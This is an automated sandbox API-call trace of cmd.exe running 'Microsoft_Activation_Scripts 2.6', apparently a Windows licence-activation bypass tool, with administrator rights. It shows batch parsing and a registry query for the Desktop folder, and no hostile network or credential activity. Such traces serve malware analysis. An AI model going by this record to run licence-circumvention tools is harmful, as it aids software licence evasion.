(_String1="set", _String2="COPY") returned 16 [0179.721] _wcsicmp (_String1="set", _String2="CD") returned 16 [0179.721] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0179.721] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0179.721] _wcsicmp (_String1="set", _String2="REN") returned 1 [0179.721] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0179.721] _wcsicmp (_String1="set", _String2="SET") returned 0 [0179.721] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.722] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0179.722] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0179.722] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0179.722] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0179.722] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0179.722] _wcsicmp (_String1="set", _String2="CD") returned 16 [0179.722] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0179.722] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0179.722] _wcsicmp (_String1="set", _String2="REN") returned 1 [0179.722] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0179.722] _wcsicmp (_String1="set", _String2="SET") returned 0 [0179.722] GetProcessHeap () returned 0x19a8f1e0000 [0179.722] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9310 [0179.722] GetProcessHeap () returned 0x19a8f1e0000 [0179.722] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9310, Size=0x26) returned 0x19a8f1eb800 [0179.722] GetProcessHeap () returned 0x19a8f1e0000 [0179.722] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x26 [0179.722] wcsncmp (_String1="_des", _String2="/", _MaxCount=0x4) returned 48 [0179.722] GetProcessHeap () returned 0x19a8f1e0000 [0179.722] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ef0 [0179.722] _wcsnicmp (_String1="_d", _String2="/A", _MaxCount=0x2) returned 48 [0179.722] _wcsnicmp (_String1="_d", _String2="/P", _MaxCount=0x2) returned 48 [0179.722] SetEnvironmentVariableW (lpName="_desktop_", lpValue=0x0) returned 1 [0179.722] GetProcessHeap () returned 0x19a8f1e0000 [0179.723] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.723] GetEnvironmentStringsW () returned 0x19a8f206860* [0179.723] GetProcessHeap () returned 0x19a8f1e0000 [0179.723] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0179.723] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f206860, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0179.723] FreeEnvironmentStringsA (penv="=") returned 1 [0179.723] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.723] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.724] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.724] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.724] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.724] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.724] SetConsoleInputExeNameW () returned 0x1 [0179.724] GetConsoleOutputCP () returned 0x1b5 [0179.725] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.725] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.725] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.725] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.725] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.725] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21b2 [0179.725] GetProcessHeap () returned 0x19a8f1e0000 [0179.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ef0) returned 1 [0179.726] GetProcessHeap () returned 0x19a8f1e0000 [0179.727] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.727] GetProcessHeap () returned 0x19a8f1e0000 [0179.728] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.728] GetProcessHeap () returned 0x19a8f1e0000 [0179.728] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0179.728] GetProcessHeap () returned 0x19a8f1e0000 [0179.728] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0179.729] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.729] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21b2 [0179.729] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.729] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8790, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2256 [0179.729] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"skip=2 tokens=2*\" %%a in ('reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop') do call set \"_desktop_=%%b\"\r\n", cbMultiByte=164, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for /f \"skip=2 tokens=2*\" %%a in ('reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop') do call set \"_desktop_=%%b\"\r\n") returned 164 [0179.730] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.730] GetFileType (hFile=0xa0) returned 0x1 [0179.730] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.730] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2256 [0179.730] GetProcessHeap () returned 0x19a8f1e0000 [0179.730] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.730] GetProcessHeap () returned 0x19a8f1e0000 [0179.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.731] _wcsicmp (_String1="for", _String2=")") returned 61 [0179.731] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0179.731] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0179.731] GetProcessHeap () returned 0x19a8f1e0000 [0179.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0179.731] GetProcessHeap () returned 0x19a8f1e0000 [0179.731] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8880 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x1a) returned 0x19a8f1eb860 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1a [0179.732] _wcsicmp (_String1="/L", _String2="/f") returned 6 [0179.732] _wcsicmp (_String1="/D", _String2="/f") returned -2 [0179.732] _wcsicmp (_String1="/F", _String2="/f") returned 0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3c) returned 0x19a8f1f9180 [0179.732] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0179.732] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0179.732] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0179.732] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0179.732] _wcsicmp (_String1="IN", _String2="in") returned 0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb950, Size=0x26) returned 0x19a8f1eb6e0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6e0) returned 0x26 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb6e0, Size=0xc0) returned 0x19a8f1eaed0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0xc0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0xc6) returned 0x19a8f1eaed0 [0179.732] GetProcessHeap () returned 0x19a8f1e0000 [0179.732] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0xc6 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0xd8) returned 0x19a8f1eaed0 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0xd8 [0179.733] _wcsicmp (_String1="DO", _String2="do") returned 0 [0179.733] _wcsicmp (_String1="call", _String2=")") returned 58 [0179.733] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.733] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.733] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.733] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.733] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.733] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e09f0 [0179.733] _tell (_FileHandle=3) returned 8790 [0179.733] _close (_FileHandle=3) returned 0 [0179.733] GetProcessHeap () returned 0x19a8f1e0000 [0179.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8ac0 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec8e0 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9e0 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec6e0 [0179.734] _wcsnicmp (_String1="skip=2 t", _String2="usebackq", _MaxCount=0x8) returned -2 [0179.734] _wcsnicmp (_String1="skip=2 ", _String2="useback", _MaxCount=0x7) returned -2 [0179.734] _wcsnicmp (_String1="skip", _String2="eol=", _MaxCount=0x4) returned 14 [0179.734] _wcsnicmp (_String1="skip=2 ", _String2="delims=", _MaxCount=0x7) returned 15 [0179.734] _wcsnicmp (_String1="skip=", _String2="skip=", _MaxCount=0x5) returned 0 [0179.734] wcstol (in: _String="2 tokens=2*\"", _EndPtr=0x43f9efed20, _Radix=0 | out: _EndPtr=0x43f9efed20*=" tokens=2*\"") returned 2 [0179.734] _wcsnicmp (_String1="tokens=2", _String2="usebackq", _MaxCount=0x8) returned -1 [0179.734] _wcsnicmp (_String1="tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0179.734] _wcsnicmp (_String1="toke", _String2="eol=", _MaxCount=0x4) returned 15 [0179.734] _wcsnicmp (_String1="tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0179.734] _wcsnicmp (_String1="token", _String2="skip=", _MaxCount=0x5) returned 1 [0179.734] _wcsnicmp (_String1="tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0179.734] wcstol (in: _String="2*\"", _EndPtr=0x43f9efed20, _Radix=0 | out: _EndPtr=0x43f9efed20*="*\"") returned 2 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec8e0, Size=0x16) returned 0x19a8f1ec720 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec720) returned 0x16 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec9e0, Size=0x28) returned 0x19a8f1eb710 [0179.734] GetProcessHeap () returned 0x19a8f1e0000 [0179.734] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x28 [0179.734] _wpopen (_Command="reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop", _Mode="rb") returned 0x7ffbed90e2a0 [0179.749] feof (_File=0x7ffbed90e2a0) returned 0 [0179.749] ferror (_File=0x7ffbed90e2a0) returned 0 [0179.749] GetProcessHeap () returned 0x19a8f1e0000 [0179.749] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x110) returned 0x19a8f1ea8b0 [0179.749] fgets (in: _Buf=0x19a8f1ea8c0, _MaxCount=256, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0180.020] feof (_File=0x7ffbed90e2a0) returned 0 [0180.020] ferror (_File=0x7ffbed90e2a0) returned 0 [0180.020] GetProcessHeap () returned 0x19a8f1e0000 [0180.020] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x210) returned 0x19a8f1f9f80 [0180.020] GetProcessHeap () returned 0x19a8f1e0000 [0180.020] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0x210 [0180.020] fgets (in: _Buf=0x19a8f1f9f92, _MaxCount=510, _File=0x7ffbed90e2a0 | out: _Buf="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\r\n", _File=0x7ffbed90e2a0) returned="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\r\n" [0180.024] feof (_File=0x7ffbed90e2a0) returned 0 [0180.024] ferror (_File=0x7ffbed90e2a0) returned 0 [0180.024] GetProcessHeap () returned 0x19a8f1e0000 [0180.024] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0x310) returned 0x19a8f200de0 [0180.024] GetProcessHeap () returned 0x19a8f1e0000 [0180.024] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x310 [0180.024] fgets (in: _Buf=0x19a8f200e4b, _MaxCount=677, _File=0x7ffbed90e2a0 | out: _Buf=" Desktop REG_EXPAND_SZ %USERPROFILE%\\Desktop\r\n", _File=0x7ffbed90e2a0) returned=" Desktop REG_EXPAND_SZ %USERPROFILE%\\Desktop\r\n" [0180.036] feof (_File=0x7ffbed90e2a0) returned 0 [0180.036] ferror (_File=0x7ffbed90e2a0) returned 0 [0180.036] fgets (in: _Buf=0x19a8f200e82, _MaxCount=622, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0180.039] feof (_File=0x7ffbed90e2a0) returned 0 [0180.039] ferror (_File=0x7ffbed90e2a0) returned 0 [0180.039] fgets (in: _Buf=0x19a8f200e84, _MaxCount=620, _File=0x7ffbed90e2a0 | out: _Buf="", _File=0x7ffbed90e2a0) returned 0x0 [0180.108] _pclose (in: _File=0x7ffbed90e2a0 | out: _File=0x7ffbed90e2a0) returned 0 [0180.144] GetProcessHeap () returned 0x19a8f1e0000 [0180.144] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x13c) returned 0x19a8f200de0 [0180.144] GetProcessHeap () returned 0x19a8f1e0000 [0180.144] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x13c [0180.144] memcpy (in: _Dst=0x19a8f200e84, _Src=0x19a8f200df0, _Size=0x94 | out: _Dst=0x19a8f200e84) returned 0x19a8f200e84 [0180.144] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\r\n Desktop REG_EXPAND_SZ %USERPROFILE%\\Desktop\r\n\r\n.", cbMultiByte=148, lpWideCharStr=0x19a8f200df0, cchWideChar=148 | out: lpWideCharStr="\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\r\n Desktop REG_EXPAND_SZ %USERPROFILE%\\Desktop\r\n\r\n.VBS") returned 148 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20d9b0, Size=0x38) returned 0x19a8f20d9b0 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20d9b0) returned 0x38 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20da00 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20da00, Size=0x148) returned 0x19a8f20da00 [0180.145] GetProcessHeap () returned 0x19a8f1e0000 [0180.145] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20da00) returned 0x148 [0180.145] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efea00, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.145] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0180.145] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0180.145] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0180.146] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0180.146] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0180.146] _wcsicmp (_String1="call", _String2="CD") returned -3 [0180.146] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0180.146] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0180.146] _wcsicmp (_String1="call", _String2="REN") returned -15 [0180.146] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0180.146] _wcsicmp (_String1="call", _String2="SET") returned -16 [0180.146] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0180.146] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0180.146] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0180.146] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0180.146] _wcsicmp (_String1="call", _String2="MD") returned -10 [0180.146] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0180.146] _wcsicmp (_String1="call", _String2="RD") returned -15 [0180.146] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0180.146] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0180.146] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0180.146] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0180.146] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0180.146] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0180.146] GetProcessHeap () returned 0x19a8f1e0000 [0180.146] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xac) returned 0x19a8f1ee250 [0180.146] GetProcessHeap () returned 0x19a8f1e0000 [0180.146] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ee250, Size=0x5e) returned 0x19a8f1ea8b0 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x5e [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x68) returned 0x19a8f1ea920 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20bc10 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20db60 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f211b80 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.147] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0180.147] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x15 [0180.147] GetProcessHeap () returned 0x19a8f1e0000 [0180.148] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.148] GetProcessHeap () returned 0x19a8f1e0000 [0180.148] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f211b80) returned 1 [0180.149] GetProcessHeap () returned 0x19a8f1e0000 [0180.149] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20db60) returned 1 [0180.150] _wcsicmp (_String1="set", _String2=")") returned 74 [0180.150] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0180.150] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0180.150] _wcsicmp (_String1="IF", _String2="set") returned -10 [0180.150] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0180.150] _wcsicmp (_String1="REM", _String2="set") returned -1 [0180.150] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0180.150] GetProcessHeap () returned 0x19a8f1e0000 [0180.150] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0180.150] GetProcessHeap () returned 0x19a8f1e0000 [0180.150] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb00 [0180.150] GetProcessHeap () returned 0x19a8f1e0000 [0180.150] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20db60 [0180.151] GetProcessHeap () returned 0x19a8f1e0000 [0180.151] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20db60) returned 1 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x66) returned 0x19a8f1ea990 [0180.152] _wcsnicmp (_String1="set", _String2="cmd ", _MaxCount=0x4) returned 16 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200f30 [0180.152] SetErrorMode (uMode=0x0) returned 0x0 [0180.152] SetErrorMode (uMode=0x1) returned 0x0 [0180.152] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200f40, lpFilePart=0x43f9efe4b0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe4b0*="System32") returned 0x13 [0180.152] SetErrorMode (uMode=0x0) returned 0x1 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200f30, Size=0x40) returned 0x19a8f200f30 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200f30) returned 0x40 [0180.152] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0180.152] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fabf0 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.152] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0180.152] GetProcessHeap () returned 0x19a8f1e0000 [0180.153] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0180.153] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0180.153] GetProcessHeap () returned 0x19a8f1e0000 [0180.153] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0180.153] GetProcessHeap () returned 0x19a8f1e0000 [0180.153] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0180.153] GetProcessHeap () returned 0x19a8f1e0000 [0180.153] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0180.153] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.153] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\set.*" (normalized: "c:\\windows\\system32\\set.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe230) returned 0xffffffffffffffff 